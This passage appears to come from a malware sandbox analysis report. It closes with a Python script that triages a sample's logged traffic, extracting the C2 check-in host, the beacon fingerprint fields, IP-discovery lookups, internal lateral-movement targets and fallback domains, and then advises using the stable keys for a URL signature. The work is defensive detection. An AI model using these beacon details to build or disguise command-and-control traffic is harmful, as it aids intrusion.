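        host, port = row.split()[2].rsplit(":", 1)   # third column is ip:port
        port = int(port)
        if ipaddress.ip_address(host).is_private:
            internal.append((host, port, PORT_SERVICES.get(port, "unknown")))
        else:
            external.append((host, port))
    return {"external": external, "internal": internal}


def unresolved_domains(rows):
    """Domains the sample looked up that never resolved (assumed fallback C2)."""
    return [r.split()[0] for r in rows if "No response" in r]


def triage(http_rows=HTTP_ROWS, conn_rows=CONN_ROWS, dns_rows=DNS_ROWS):
    reqs = [parse_http_row(r) for r in http_rows]
    # The check-in is the request that carries a query string; the query-less
    # GETs to IP-echo services are the sample learning its public address first.
    checkin = [r for r in reqs if urlsplit(r["url"]).query]
    ip_discovery = [urlsplit(r["url"]).netloc for r in reqs
                    if not urlsplit(r["url"]).query]
    conns = classify_connections(conn_rows)
    return {
        "checkin_host": urlsplit(checkin[0]["url"]).netloc if checkin else None,
        "fingerprint": beacon_fields(checkin[0]["url"]) if checkin else {},
        "ip_discovery": ip_discovery,
        "lateral_targets": conns["internal"],
        "external_endpoints": conns["external"],
        "fallback_domains": unresolved_domains(dns_rows),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

Running the script prints the summary as JSON. The fingerprint keys it recovers (id, mac, OS, BIT, IT, c, VER, d, from, mpass, size, num, sa) are the stable part of this beacon and a better basis for a URL signature than the volatile values, which change per host and per run.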

1 ETPRO signature is available in the full report

Debug output strings

No debug info.